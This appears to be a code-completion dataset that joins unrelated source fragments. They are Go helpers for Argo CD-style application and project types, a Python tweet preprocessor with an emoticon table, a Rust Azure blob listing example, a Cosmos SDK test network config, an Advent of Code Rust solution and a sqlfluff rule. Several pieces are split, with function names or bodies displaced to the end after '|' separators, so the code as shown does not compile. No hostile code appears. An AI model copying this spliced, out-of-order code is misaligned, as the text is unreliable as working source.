// Comparison is a deep structural equality over all fields.
func (source *ApplicationSource) Equals(other ApplicationSource) bool {
	return reflect.DeepEqual(*source, other)
}
// ExplicitType infers the single explicitly-configured source type of an
// application source. It returns nil when no tool-specific config block is
// set, and an error when more than one is set.
func (source *ApplicationSource) ExplicitType() (*ApplicationSourceType, error) {
	var appTypes []ApplicationSourceType
	for _, candidate := range []struct {
		set bool
		t   ApplicationSourceType
	}{
		{source.Kustomize != nil, ApplicationSourceTypeKustomize},
		{source.Helm != nil, ApplicationSourceTypeHelm},
		{source.Ksonnet != nil, ApplicationSourceTypeKsonnet},
		{source.Directory != nil, ApplicationSourceTypeDirectory},
		{source.Plugin != nil, ApplicationSourceTypePlugin},
	} {
		if candidate.set {
			appTypes = append(appTypes, candidate.t)
		}
	}
	switch len(appTypes) {
	case 0:
		return nil, nil
	case 1:
		appType := appTypes[0]
		return &appType, nil
	default:
		typeNames := make([]string, len(appTypes))
		for i, t := range appTypes {
			typeNames[i] = string(t)
		}
		return nil, fmt.Errorf("multiple application sources defined: %s", strings.Join(typeNames, ","))
	}
}
// Equals compares two instances of ApplicationDestination and return true if instances are equal.
func (dest ApplicationDestination) Equals(other ApplicationDestination) bool {
	// ignore destination cluster name and isServerInferred fields during comparison
	// since server URL is inferred from cluster name
	// (both receiver and argument are value copies, so clearing is safe)
	if dest.isServerInferred {
		dest.Server = ""
		dest.isServerInferred = false
	}
	if other.isServerInferred {
		other.Server = ""
		other.isServerInferred = false
	}
	return reflect.DeepEqual(dest, other)
}
// GetProject returns the application's project, falling back to the default
// project name when spec.Project is empty. Preferred over reading spec.Project
// directly.
func (spec ApplicationSpec) GetProject() string {
	if spec.Project != "" {
		return spec.Project
	}
	return common.DefaultAppProjectName
}
// GetRevisionHistoryLimit returns the configured revision history limit, or
// the global default when unset.
func (spec ApplicationSpec) GetRevisionHistoryLimit() int {
	if limit := spec.RevisionHistoryLimit; limit != nil {
		return int(*limit)
	}
	return common.RevisionHistoryLimit
}
// isResourceInList reports whether res matches any entry of list, where both
// the Kind and Group fields of each entry are interpreted as filepath-style
// glob patterns.
func isResourceInList(res metav1.GroupKind, list []metav1.GroupKind) bool {
	for _, item := range list {
		kindOK, kindErr := filepath.Match(item.Kind, res.Kind)
		if !kindOK || kindErr != nil {
			continue
		}
		groupOK, groupErr := filepath.Match(item.Group, res.Group)
		if groupOK && groupErr == nil {
			return true
		}
	}
	return false
}
// IsGroupKindPermitted validates if the given resource group/kind is permitted to be deployed in the project
func (proj AppProject) IsGroupKindPermitted(gk schema.GroupKind, namespaced bool) bool {
	var isWhiteListed, isBlackListed bool
	res := metav1.GroupKind{Group: gk.Group, Kind: gk.Kind}
	if namespaced {
		namespaceWhitelist := proj.Spec.NamespaceResourceWhitelist
		namespaceBlacklist := proj.Spec.NamespaceResourceBlacklist
		// Precedence note: this parses as `nil || (len != 0 && inList)`, so a
		// nil whitelist permits everything while a non-nil empty whitelist
		// permits nothing.
		isWhiteListed = namespaceWhitelist == nil || len(namespaceWhitelist) != 0 && isResourceInList(res, namespaceWhitelist)
		isBlackListed = len(namespaceBlacklist) != 0 && isResourceInList(res, namespaceBlacklist)
		return isWhiteListed && !isBlackListed
	}
	// Cluster-scoped resources: unlike the namespaced case, an empty (or nil)
	// cluster whitelist permits nothing.
	clusterWhitelist := proj.Spec.ClusterResourceWhitelist
	clusterBlacklist := proj.Spec.ClusterResourceBlacklist
	isWhiteListed = len(clusterWhitelist) != 0 && isResourceInList(res, clusterWhitelist)
	isBlackListed = len(clusterBlacklist) != 0 && isResourceInList(res, clusterBlacklist)
	return isWhiteListed && !isBlackListed
}
// IsLiveResourcePermitted reports whether a live cluster resource is permitted
// in the project, combining group/kind rules with, for namespaced resources,
// the project's destination rules.
func (proj AppProject) IsLiveResourcePermitted(un *unstructured.Unstructured, server string) bool {
	namespace := un.GetNamespace()
	if !proj.IsGroupKindPermitted(un.GroupVersionKind().GroupKind(), namespace != "") {
		return false
	}
	if namespace == "" {
		return true
	}
	return proj.IsDestinationPermitted(ApplicationDestination{Server: server, Namespace: namespace})
}
// getFinalizerIndex returns finalizer index in the list of object finalizers or -1 if finalizer does not exist
func getFinalizerIndex(meta metav1.ObjectMeta, name string) int {
	for i := range meta.Finalizers {
		if meta.Finalizers[i] == name {
			return i
		}
	}
	return -1
}
// setFinalizer adds or removes the named finalizer so that its presence
// matches exist. Removal swaps the last element into the vacated slot, so
// finalizer order is not preserved (matching the original implementation).
func setFinalizer(meta *metav1.ObjectMeta, name string, exist bool) {
	index := getFinalizerIndex(*meta, name)
	present := index > -1
	if exist == present {
		return
	}
	if present {
		last := len(meta.Finalizers) - 1
		meta.Finalizers[index] = meta.Finalizers[last]
		meta.Finalizers = meta.Finalizers[:last]
	} else {
		meta.Finalizers = append(meta.Finalizers, name)
	}
}
// HasFinalizer reports whether the project carries the resources finalizer.
func (proj AppProject) HasFinalizer() bool {
	return getFinalizerIndex(proj.ObjectMeta, common.ResourcesFinalizerName) > -1
}
// RemoveFinalizer removes the resources finalizer from the project.
func (proj *AppProject) RemoveFinalizer() {
	setFinalizer(&proj.ObjectMeta, common.ResourcesFinalizerName, false)
}
// globMatch reports whether val matches pattern, short-circuiting the bare
// "*" wildcard before delegating to the glob matcher.
func globMatch(pattern string, val string, separators ...rune) bool {
	if pattern != "*" {
		return glob.Match(pattern, val, separators...)
	}
	return true
}
// IsSourcePermitted validates if the provided application's source is one of
// the allowed sources for the project. Repo URLs are normalized on both sides
// before glob comparison, with '/' as the separator.
func (proj AppProject) IsSourcePermitted(src ApplicationSource) bool {
	srcNormalized := git.NormalizeGitURL(src.RepoURL)
	for _, repoURL := range proj.Spec.SourceRepos {
		if globMatch(git.NormalizeGitURL(repoURL), srcNormalized, '/') {
			return true
		}
	}
	return false
}
// IsDestinationPermitted validates if the provided application's destination
// is one of the allowed destinations for the project. Both the server URL and
// the namespace entries are matched as glob patterns.
func (proj AppProject) IsDestinationPermitted(dst ApplicationDestination) bool {
	for _, item := range proj.Spec.Destinations {
		serverOK := globMatch(item.Server, dst.Server)
		if serverOK && globMatch(item.Namespace, dst.Namespace) {
			return true
		}
	}
	return false
}
// SetK8SConfigDefaults sets Kubernetes REST config default settings:
// client-side throttling (QPS/burst) and a custom HTTP transport with
// tuned connection pooling. The auth/exec providers are folded into the
// custom transport and then cleared from the config.
func SetK8SConfigDefaults(config *rest.Config) error {
	// Client-side rate limiting.
	config.QPS = common.K8sClientConfigQPS
	config.Burst = common.K8sClientConfigBurst
	tlsConfig, err := rest.TLSConfigFor(config)
	if err != nil {
		return err
	}
	dial := (&net.Dialer{
		Timeout:   30 * time.Second,
		KeepAlive: 30 * time.Second,
	}).DialContext
	// Connection pool sized by K8sMaxIdleConnections for idle, per-host idle,
	// and per-host totals alike.
	transport := utilnet.SetTransportDefaults(&http.Transport{
		Proxy:               http.ProxyFromEnvironment,
		TLSHandshakeTimeout: 10 * time.Second,
		TLSClientConfig:     tlsConfig,
		MaxIdleConns:        common.K8sMaxIdleConnections,
		MaxIdleConnsPerHost: common.K8sMaxIdleConnections,
		MaxConnsPerHost:     common.K8sMaxIdleConnections,
		DialContext:         dial,
		DisableCompression:  config.DisableCompression,
	})
	// Wrap the transport with the config's auth (bearer/basic/exec) handling.
	tr, err := rest.HTTPWrappersForConfig(config, transport)
	if err != nil {
		return err
	}
	// set default tls config and remove auth/exec provides since we use it in a custom transport
	config.TLSClientConfig = rest.TLSClientConfig{}
	config.AuthProvider = nil
	config.ExecProvider = nil
	config.Transport = tr
	return nil
}
// RawRestConfig returns a go-client REST config from cluster that might be serialized into the file using kube.WriteKubeConfig method.
//
// Branches, in order:
//  1. fake in-cluster mode (env flag set): load from KUBECONFIG or ~/.kube/config;
//  2. real in-cluster address with no explicit credentials: rest.InClusterConfig;
//  3. otherwise build a config from the stored cluster credentials
//     (AWS EKS exec, generic exec provider, or basic/bearer auth).
//
// Panics if no config could be built.
func (c *Cluster) RawRestConfig() *rest.Config {
	var config *rest.Config
	var err error
	if c.Server == common.KubernetesInternalAPIServerAddr && os.Getenv(common.EnvVarFakeInClusterConfig) == "true" {
		// Test/dev escape hatch: pretend to be in-cluster but read a kubeconfig.
		conf, exists := os.LookupEnv("KUBECONFIG")
		if exists {
			config, err = clientcmd.BuildConfigFromFlags("", conf)
		} else {
			config, err = clientcmd.BuildConfigFromFlags("", filepath.Join(os.Getenv("HOME"), ".kube", "config"))
		}
	} else if c.Server == common.KubernetesInternalAPIServerAddr && c.Config.Username == "" && c.Config.Password == "" && c.Config.BearerToken == "" {
		// In-cluster address and no explicit credentials: use the pod's service account.
		config, err = rest.InClusterConfig()
	} else {
		tlsClientConfig := rest.TLSClientConfig{
			Insecure:   c.Config.TLSClientConfig.Insecure,
			ServerName: c.Config.TLSClientConfig.ServerName,
			CertData:   c.Config.TLSClientConfig.CertData,
			KeyData:    c.Config.TLSClientConfig.KeyData,
			CAData:     c.Config.TLSClientConfig.CAData,
		}
		if c.Config.AWSAuthConfig != nil {
			// EKS: authenticate via the aws CLI's token plugin.
			args := []string{"eks", "get-token", "--cluster-name", c.Config.AWSAuthConfig.ClusterName}
			if c.Config.AWSAuthConfig.RoleARN != "" {
				args = append(args, "--role-arn", c.Config.AWSAuthConfig.RoleARN)
			}
			config = &rest.Config{
				Host:            c.Server,
				TLSClientConfig: tlsClientConfig,
				ExecProvider: &api.ExecConfig{
					// NOTE(review): client.authentication.k8s.io/v1alpha1 was
					// removed in newer Kubernetes releases — confirm the
					// supported exec API version for target clusters.
					APIVersion: "client.authentication.k8s.io/v1alpha1",
					Command:    "aws",
					Args:       args,
				},
			}
		} else if c.Config.ExecProviderConfig != nil {
			// Generic exec credential plugin configured on the cluster.
			var env []api.ExecEnvVar
			if c.Config.ExecProviderConfig.Env != nil {
				for key, value := range c.Config.ExecProviderConfig.Env {
					env = append(env, api.ExecEnvVar{
						Name:  key,
						Value: value,
					})
				}
			}
			config = &rest.Config{
				Host:            c.Server,
				TLSClientConfig: tlsClientConfig,
				ExecProvider: &api.ExecConfig{
					APIVersion:  c.Config.ExecProviderConfig.APIVersion,
					Command:     c.Config.ExecProviderConfig.Command,
					Args:        c.Config.ExecProviderConfig.Args,
					Env:         env,
					InstallHint: c.Config.ExecProviderConfig.InstallHint,
				},
			}
		} else {
			// Plain basic-auth / bearer-token credentials.
			config = &rest.Config{
				Host:            c.Server,
				Username:        c.Config.Username,
				Password:        c.Config.Password,
				BearerToken:     c.Config.BearerToken,
				TLSClientConfig: tlsClientConfig,
			}
		}
	}
	if err != nil {
		panic(fmt.Sprintf("Unable to create K8s REST config: %v", err))
	}
	return config
}
// RESTConfig returns a go-client REST config from cluster with tuned
// throttling and HTTP client settings. It panics when the defaults cannot
// be applied, mirroring RawRestConfig's failure behavior.
func (c *Cluster) RESTConfig() *rest.Config {
	config := c.RawRestConfig()
	if err := SetK8SConfigDefaults(config); err != nil {
		panic(fmt.Sprintf("Unable to apply K8s REST config defaults: %v", err))
	}
	return config
}
// UnmarshalToUnstructured parses a JSON-encoded resource into an unstructured
// object. An empty string or the literal "null" yields (nil, nil).
func UnmarshalToUnstructured(resource string) (*unstructured.Unstructured, error) {
	switch resource {
	case "", "null":
		return nil, nil
	}
	obj := &unstructured.Unstructured{}
	if err := json.Unmarshal([]byte(resource), obj); err != nil {
		return nil, err
	}
	return obj, nil
}
// LiveObject decodes the diff's serialized live state into an unstructured object.
func (r ResourceDiff) LiveObject() (*unstructured.Unstructured, error) {
	return UnmarshalToUnstructured(r.LiveState)
}

// TargetObject decodes the diff's serialized target state into an unstructured object.
func (r ResourceDiff) TargetObject() (*unstructured.Unstructured, error) {
	return UnmarshalToUnstructured(r.TargetState)
}

// SetInferredServer sets a server URL that was inferred rather than
// user-specified, and marks the destination accordingly.
func (d *ApplicationDestination) SetInferredServer(server string) {
	d.isServerInferred = true
	d.Server = server
}

// IsServerInferred reports whether the destination server was set via SetInferredServer.
func (d *ApplicationDestination) IsServerInferred() bool {
	return d.isServerInferred
}
// MarshalJSON serializes the destination, omitting the server URL when it was
// inferred (the value is cleared on a deep copy so the receiver is untouched).
// The local Alias type carries the same fields but no methods, which prevents
// json.Marshal from recursing back into this MarshalJSON.
func (d *ApplicationDestination) MarshalJSON() ([]byte, error) {
	type Alias ApplicationDestination
	dest := d
	if d.isServerInferred {
		dest = dest.DeepCopy()
		dest.Server = ""
	}
	return json.Marshal(&struct{ *Alias }{Alias: (*Alias)(dest)})
}
// NormalizeJWTTokens assigns an ID (the IssuedAt timestamp as a string) to
// every JWT token in both spec roles and status that lacks one, then syncs
// tokens between spec and status. Returns true when anything was changed and
// the project should be persisted.
func (proj *AppProject) NormalizeJWTTokens() bool {
	needNormalize := false
	// Backfill missing IDs on tokens declared in the spec roles.
	for i, role := range proj.Spec.Roles {
		for j, token := range role.JWTTokens {
			if token.ID == "" {
				token.ID = strconv.FormatInt(token.IssuedAt, 10)
				role.JWTTokens[j] = token
				needNormalize = true
			}
		}
		proj.Spec.Roles[i] = role
	}
	// Backfill missing IDs on tokens tracked in the status.
	// (roleTokenEntry.Items shares backing storage with the map value, so
	// writing Items[j] updates the status in place.)
	for _, roleTokenEntry := range proj.Status.JWTTokensByRole {
		for j, token := range roleTokenEntry.Items {
			if token.ID == "" {
				token.ID = strconv.FormatInt(token.IssuedAt, 10)
				roleTokenEntry.Items[j] = token
				needNormalize = true
			}
		}
	}
	needSync := syncJWTTokenBetweenStatusAndSpec(proj)
	return needNormalize || needSync
}
// syncJWTTokenBetweenStatusAndSpec merges the JWT tokens recorded in the
// project spec roles with those in the status so that both hold the same,
// IssuedAt-descending list, and drops status entries for roles that no longer
// exist. Returns true when either side was modified.
func syncJWTTokenBetweenStatusAndSpec(proj *AppProject) bool {
	existingRole := map[string]bool{}
	needSync := false
	for roleIndex, role := range proj.Spec.Roles {
		existingRole[role.Name] = true
		tokensInSpec := role.JWTTokens
		tokensInStatus := []JWTToken{}
		if proj.Status.JWTTokensByRole == nil {
			tokensByRole := make(map[string]JWTTokens)
			proj.Status.JWTTokensByRole = tokensByRole
		} else {
			tokensInStatus = proj.Status.JWTTokensByRole[role.Name].Items
		}
		// Union of both sides, de-duplicated by ID.
		tokens := jwtTokensCombine(tokensInStatus, tokensInSpec)
		// Sort both sides the same way before comparing, so ordering
		// differences alone do not count as a change... then compare each
		// side against the merged list to decide whether a sync happened.
		sort.Slice(proj.Spec.Roles[roleIndex].JWTTokens, func(i, j int) bool {
			return proj.Spec.Roles[roleIndex].JWTTokens[i].IssuedAt > proj.Spec.Roles[roleIndex].JWTTokens[j].IssuedAt
		})
		sort.Slice(proj.Status.JWTTokensByRole[role.Name].Items, func(i, j int) bool {
			return proj.Status.JWTTokensByRole[role.Name].Items[i].IssuedAt > proj.Status.JWTTokensByRole[role.Name].Items[j].IssuedAt
		})
		if !cmp.Equal(tokens, proj.Spec.Roles[roleIndex].JWTTokens) || !cmp.Equal(tokens, proj.Status.JWTTokensByRole[role.Name].Items) {
			needSync = true
		}
		proj.Spec.Roles[roleIndex].JWTTokens = tokens
		proj.Status.JWTTokensByRole[role.Name] = JWTTokens{Items: tokens}
	}
	// Garbage-collect status entries for roles removed from the spec.
	if proj.Status.JWTTokensByRole != nil {
		for role := range proj.Status.JWTTokensByRole {
			if !existingRole[role] {
				delete(proj.Status.JWTTokensByRole, role)
				needSync = true
			}
		}
	}
	return needSync
}
// jwtTokensCombine merges two token lists, de-duplicating by token ID (an
// entry from tokens2 wins over one from tokens1 with the same ID), and
// returns the result sorted by IssuedAt, newest first.
func jwtTokensCombine(tokens1 []JWTToken, tokens2 []JWTToken) []JWTToken {
	byID := make(map[string]JWTToken)
	for _, t := range tokens1 {
		byID[t.ID] = t
	}
	for _, t := range tokens2 {
		byID[t.ID] = t
	}
	var merged []JWTToken
	for _, t := range byID {
		merged = append(merged, t)
	}
	sort.Slice(merged, func(i, j int) bool {
		return merged[i].IssuedAt > merged[j].IssuedAt
	})
	return merged
}
| {
if strings.TrimSpace(name) == "" {
return status.Errorf(codes.InvalidArgument, "group '%s' is empty", name)
}
if invalidChars.MatchString(name) {
return status.Errorf(codes.InvalidArgument, "group '%s' contains invalid characters", name)
}
return nil
} |
PreProcess.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
####
#### Author: Pedro Paulo Balage Filho
#### Version: 1.0
#### Date: 12/03/13
####
from string import punctuation, letters
import re
# Requires Pattern library (http://www.clips.ua.ac.be/pages/pattern)
from pattern.en import tag
from pattern.vector import stem, PORTER
### Provides a pre-process for tweet messages.
### Replace emoticons, hash, mentions and urls for codes
### Correct long seguences of letters and punctuations
### Apply the Pattern part-of_speech tagger to the message
### Requires the Pattern library to work (http://www.clips.ua.ac.be/pages/pattern)
def pre_process(tweet_message):
    """Pre-process a raw tweet message for sentiment analysis.

    Steps (in order):
      1. decode to unicode, ignoring encoding errors;
      2. replace hashtags, @mentions and URLs with marker codes;
      3. map emoticons to sentiment codes (&happy, &sad, &wink, ...);
      4. normalize runs of punctuation ("!!!" -> "! &emphasis") and letters
         ("cooool" -> "col");
      5. collapse whitespace and run the Pattern part-of-speech tagger.

    Returns the tweet in the format [(word, tag), ...].

    NOTE(review): this is Python 2 code (str.decode, string.letters) and
    requires the Pattern library.
    """
    # Pattern tag -> a fast tagger
    # assures the message can be converted to unicode. Reject the encoding
    # errors
    tweet_message = tweet_message.decode('utf8',errors='ignore')
    # substitute hashes
    tweet_message = re.sub(re.escape('#')+r'(\w+)','&hash \g<1>',tweet_message)
    # substitute users mentions
    tweet_message = re.sub(re.escape('@')+r'(\w+)','&mention \g<1>',tweet_message)
    # substitute urls
    tweet_message = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+','&url',tweet_message)
    # look for emoticons.
    # Some elements from http://en.wikipedia.org/wiki/List_of_emoticons
    emoticons = { ':-)' : '&happy',
                  ':)' : '&happy',
                  ':o)' : '&happy',
                  ':]' : '&happy',
                  ':3' : '&happy',
                  ':c)' : '&happy',
                  ':>' : '&happy',
                  '=]' : '&happy',
                  '8)' : '&happy',
                  '=)' : '&happy',
                  ':}' : '&happy',
                  ':^)' : '&happy',
                  ':-))' : '&happy',
                  '|;-)' : '&happy',
                  ":'-)" : '&happy',
                  ":')" : '&happy',
                  '\o/' : '&happy',
                  '*\\0/*': '&happy',
                  ':-D' : '&laugh',
                  ':D' : '&laugh',
                  '8-D' : '&laugh',
                  '8D' : '&laugh',
                  'x-D' : '&laugh',
                  'xD' : '&laugh',
                  'X-D' : '&laugh',
                  'XD' : '&laugh',
                  '=-D' : '&laugh',
                  '=D' : '&laugh',
                  '=-3' : '&laugh',
                  '=3' : '&laugh',
                  'B^D' : '&laugh',
                  '>:[' : '&sad',
                  ':-(' : '&sad',
                  ':(' : '&sad',
                  ':-c' : '&sad',
                  ':c' : '&sad',
                  ':-<' : '&sad',
                  ':<' : '&sad',
                  ':-[' : '&sad',
                  ':[' : '&sad',
                  ':{' : '&sad',
                  ':-||' : '&sad',
                  ':@' : '&sad',
                  ":'-(" : '&sad',
                  ":'(" : '&sad',
                  'D:<' : '&sad',
                  'D:' : '&sad',
                  'D8' : '&sad',
                  'D;' : '&sad',
                  'D=' : '&sad',
                  'DX' : '&sad',
                  'v.v' : '&sad',
                  "D-':" : '&sad',
                  '(>_<)' : '&sad',
                  ':|' : '&sad',
                  '>:O' : '&surprise',
                  ':-O' : '&surprise',
                  ':-o' : '&surprise',
                  ':O' : '&surprise',
                  '°o°' : '&surprise',
                  ':O' : '&surprise',
                  'o_O' : '&surprise',
                  'o_0' : '&surprise',
                  'o.O' : '&surprise',
                  '8-0' : '&surprise',
                  '|-O' : '&surprise',
                  ';-)' : '&wink',
                  ';)' : '&wink',
                  '*-)' : '&wink',
                  '*)' : '&wink',
                  ';-]' : '&wink',
                  ';]' : '&wink',
                  ';D' : '&wink',
                  ';^)' : '&wink',
                  ':-,' : '&wink',
                  '>:P' : '&tong',
                  ':-P' : '&tong',
                  ':P' : '&tong',
                  'X-P' : '&tong',
                  'x-p' : '&tong',
                  'xp' : '&tong',
                  'XP' : '&tong',
                  ':-p' : '&tong',
                  ':p' : '&tong',
                  '=p' : '&tong',
                  ':-Þ' : '&tong',
                  ':Þ' : '&tong',
                  ':-b' : '&tong',
                  ':b' : '&tong',
                  ':-&' : '&tong',
                  ':&' : '&tong',
                  '>:\\' : '&annoyed',
                  '>:/' : '&annoyed',
                  ':-/' : '&annoyed',
                  ':-.' : '&annoyed',
                  ':/' : '&annoyed',
                  ':\\' : '&annoyed',
                  '=/' : '&annoyed',
                  '=\\' : '&annoyed',
                  ':L' : '&annoyed',
                  '=L' : '&annoyed',
                  ':S' : '&annoyed',
                  '>.<' : '&annoyed',
                  ':-|' : '&annoyed',
                  '<:-|' : '&annoyed',
                  ':-X' : '&seallips',
                  ':X' : '&seallips',
                  ':-#' : '&seallips',
                  ':#' : '&seallips',
                  'O:-)' : '&angel',
                  '0:-3' : '&angel',
                  '0:3' : '&angel',
                  '0:-)' : '&angel',
                  '0:)' : '&angel',
                  '0;^)' : '&angel',
                  '>:)' : '&devil',
                  '>;)' : '&devil',
                  '>:-)' : '&devil',
                  '}:-)' : '&devil',
                  '}:)' : '&devil',
                  '3:-)' : '&devil',
                  '3:)' : '&devil',
                  'o/\o' : '&highfive',
                  '^5' : '&highfive',
                  '>_>^' : '&highfive',
                  '^<_<' : '&highfive',
                  '<3' : '&heart'
                }
    # substitute emoticons using regular expression
    # (a trailing space is appended so an emoticon at the end of the tweet
    # still matches the [^a-z0-9A-Z] boundary)
    for symbol in emoticons:
        tweet_message = re.sub(r'('+re.escape(symbol)+r')[^a-z0-9A-Z]',' \g<1> '+emoticons[symbol]+' ',tweet_message+' ')
    # normalize punctuation signals, like ..., !!!!!!!!, ???????, etc
    tweet_message = re.sub(re.escape('...'),'.' + ' &dots',tweet_message)
    for symbol in punctuation:
        tweet_message = re.sub(re.escape(symbol)+r'{3,}',' ' + symbol + ' &emphasis',tweet_message)
    # normalize long sequence of letters coooool -> col, looooove -> love,
    # gooooodd -> god
    # (always keep one letter)
    for symbol in letters:
        tweet_message = re.sub(re.escape(symbol)+r'{3,}', symbol ,tweet_message)
    # remove many blank spaces.
    tweet_message = re.sub(' +',' ' ,tweet_message)
    tweet_message = tweet_message.strip()
    # Include POS information
    tweet_message = tag(tweet_message, tokenize=False)
    # Stemmer?
    #tweet_message = [(stem(w, stemmer=PORTER),t) for w,t in tweet_message]
    # return the twitte in the format [(word,tag),...]
    return tweet_message
|
|
blob_01.rs | use azure_storage::core::prelude::*;
use azure_storage_blobs::prelude::*;
#[tokio::main]
async fn | () -> azure_core::Result<()> {
env_logger::init();
// First we retrieve the account name and master key from environment variables.
let account =
std::env::var("STORAGE_ACCOUNT").expect("Set env variable STORAGE_ACCOUNT first!");
let master_key =
std::env::var("STORAGE_MASTER_KEY").expect("Set env variable STORAGE_MASTER_KEY first!");
let container_name = std::env::args()
.nth(1)
.expect("please specify container name as command line parameter");
let http_client = azure_core::new_http_client();
let storage_client =
StorageAccountClient::new_access_key(http_client.clone(), &account, &master_key)
.as_storage_client();
let container_client = storage_client.as_container_client(&container_name);
let blob_client = container_client.as_blob_client("SorgeniaReorganizeRebuildIndexes.zip");
let _res = container_client
.list_blobs()
.include_copy(true)
.include_deleted(true)
.include_metadata(true)
.include_snapshots(true)
.include_uncommitted_blobs(true)
.execute()
.await?;
let result = blob_client.get().execute().await?;
println!("{:?}", result);
Ok(())
}
| main |
network.go | package network
import (
"fmt"
"testing"
"time"
"github.com/cosmos/cosmos-sdk/baseapp"
"github.com/cosmos/cosmos-sdk/crypto/hd"
"github.com/cosmos/cosmos-sdk/crypto/keyring"
servertypes "github.com/cosmos/cosmos-sdk/server/types"
"github.com/cosmos/cosmos-sdk/simapp"
storetypes "github.com/cosmos/cosmos-sdk/store/types"
"github.com/cosmos/cosmos-sdk/testutil/network"
sdk "github.com/cosmos/cosmos-sdk/types"
authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
tmrand "github.com/tendermint/tendermint/libs/rand"
tmdb "github.com/tendermint/tm-db"
"github.com/crypto-org-chain/cronos/app"
)
// Aliases re-exported so callers can use this package's types without also
// importing cosmos-sdk's testutil/network package directly.
type (
	Network = network.Network
	Config  = network.Config
)
// New creates instance with fully configured cosmos network.
// Accepts optional config, that will be used in place of the DefaultConfig() if provided.
// Passing more than one config panics.
func New(t *testing.T, configs ...network.Config) *network.Network {
	var cfg network.Config
	switch len(configs) {
	case 0:
		cfg = DefaultConfig()
	case 1:
		cfg = configs[0]
	default:
		panic("at most one config should be provided")
	}
	net := network.New(t, cfg)
	// Tear the network down when the test finishes.
	t.Cleanup(net.Cleanup)
	return net
}
// DefaultConfig will initialize config for the network with custom application,
// genesis and single validator. All other parameters are inherited from cosmos-sdk/testutil/network.DefaultConfig
func DefaultConfig() network.Config {
encoding := app.MakeEncodingConfig()
return network.Config{
Codec: encoding.Marshaler,
TxConfig: encoding.TxConfig,
LegacyAmino: encoding.Amino,
InterfaceRegistry: encoding.InterfaceRegistry,
AccountRetriever: authtypes.AccountRetriever{},
AppConstructor: func(val network.Validator) servertypes.Application {
return app.New(
val.Ctx.Logger, tmdb.NewMemDB(), nil, true, map[int64]bool{}, val.Ctx.Config.RootDir, 0,
encoding,
// this line is used by starport scaffolding # stargate/testutil/appArgument | baseapp.SetPruning(storetypes.NewPruningOptionsFromString(val.AppConfig.Pruning)),
baseapp.SetMinGasPrices(val.AppConfig.MinGasPrices),
)
},
GenesisState: app.ModuleBasics.DefaultGenesis(encoding.Marshaler),
TimeoutCommit: 2 * time.Second,
ChainID: "chain-" + tmrand.NewRand().Str(6),
NumValidators: 1,
BondDenom: sdk.DefaultBondDenom,
MinGasPrices: fmt.Sprintf("0.000006%s", sdk.DefaultBondDenom),
AccountTokens: sdk.TokensFromConsensusPower(1000, sdk.DefaultPowerReduction),
StakingTokens: sdk.TokensFromConsensusPower(500, sdk.DefaultPowerReduction),
BondedTokens: sdk.TokensFromConsensusPower(100, sdk.DefaultPowerReduction),
PruningStrategy: storetypes.PruningOptionNothing,
CleanupDir: true,
SigningAlgo: string(hd.Secp256k1Type),
KeyringOptions: []keyring.Option{},
}
} | simapp.EmptyAppOptions{}, |
9-2.rs | mod xmas {
use std::collections::VecDeque;
pub struct Xmas {
preamble_size: usize,
numbers: VecDeque<usize>,
}
impl Xmas {
pub fn new(preamble_size: usize) -> Xmas {
Xmas {
preamble_size,
numbers: VecDeque::new(),
}
}
pub fn push(&mut self, number: usize) |
pub fn is_valid(&self, number: usize) -> bool {
let length = self.numbers.len();
for i in 0..length {
for j in i..length {
if self.numbers[i] + self.numbers[j] == number {
return true;
}
}
}
false
}
}
}
use crate::xmas::*;
use std::io::{self, Read};
/// Searches `numbers` for a contiguous run summing to `search_sum`, returning
/// the first such run found scanning left to right, or None.
///
/// Bug fix: the inner bound was `j in i..length`, so the window
/// `numbers[i..j]` could never extend through the final element (runs ending
/// at the last number were silently skipped). `i..=length` covers every
/// window while preserving all previously-found results.
fn find_contiguous_summands(numbers: Vec<usize>, search_sum: usize) -> Option<Vec<usize>> {
    let length = numbers.len();
    for i in 0..length {
        for j in i..=length {
            // Window is numbers[i..j]; its sum only grows with j, so bail
            // out early once it overshoots the target.
            let window = numbers.iter().skip(i).take(j - i);
            let window_sum: usize = window.clone().sum();
            if window_sum == search_sum {
                return Some(window.copied().collect());
            } else if window_sum > search_sum {
                break;
            }
        }
    }
    None
}
/// Reads one number per line from stdin, finds the first number that is not a
/// sum of two of the previous 25 (part 1), then finds a contiguous run
/// summing to that number and reports its min + max (part 2).
fn main() -> Result<(), Box<dyn std::error::Error>> {
    let input = {
        let mut buffer = String::new();
        let mut stdin = io::stdin();
        stdin.read_to_string(&mut buffer)?;
        buffer
    };
    let numbers: Vec<usize> = input.lines().map(|line| line.parse().unwrap()).collect();
    let invalid_number = {
        let preamble_size = 25;
        let mut xmas = Xmas::new(preamble_size);
        let mut remaining_numbers = numbers.clone();
        // Seed the window with the preamble; the drained numbers are not
        // themselves validated.
        remaining_numbers
            .drain(0..preamble_size)
            .for_each(|number| xmas.push(number));
        let mut invalid_number = None;
        for number in remaining_numbers {
            if xmas.is_valid(number) {
                xmas.push(number);
            } else {
                invalid_number = Some(number);
                break;
            }
        }
        match invalid_number {
            Some(n) => n,
            None => panic!("Couldn't find first invalid number"),
        }
    };
    println!("First invalid number: {}", invalid_number);
    match find_contiguous_summands(numbers, invalid_number) {
        Some(sequence) => {
            let min = sequence.iter().min().unwrap();
            let max = sequence.iter().max().unwrap();
            println!(
                "Sequence: {:#?}\nSmallest: {}\nLargest: {}\nSum: {}",
                sequence,
                min,
                max,
                min + max
            )
        }
        None => panic!("Failed to find sequence"),
    }
    Ok(())
}
| {
self.numbers.push_back(number);
if self.numbers.len() > self.preamble_size {
self.numbers.pop_front();
}
} |
L018.py | """Implementation of Rule L018."""
from sqlfluff.core.parser import NewlineSegment, WhitespaceSegment
from sqlfluff.core.rules.base import BaseRule, LintFix, LintResult
from sqlfluff.core.rules.doc_decorators import document_fix_compatible
@document_fix_compatible
class Rule_L018(BaseRule):
    """WITH clause closing bracket should be aligned with WITH keyword.

    | **Anti-pattern**
    | The • character represents a space.
    | In this example, the closing bracket is not aligned with WITH keyword.

    .. code-block::

        WITH zoo AS (
            SELECT a FROM foo
        ••••)

        SELECT * FROM zoo

    | **Best practice**
    | Remove the spaces to align the WITH keyword with the closing bracket.

    .. code-block::

        WITH zoo AS (
            SELECT a FROM foo
        )

        SELECT * FROM zoo

    """

    _works_on_unparsable = False
    config_keywords = ["tab_space_size"]

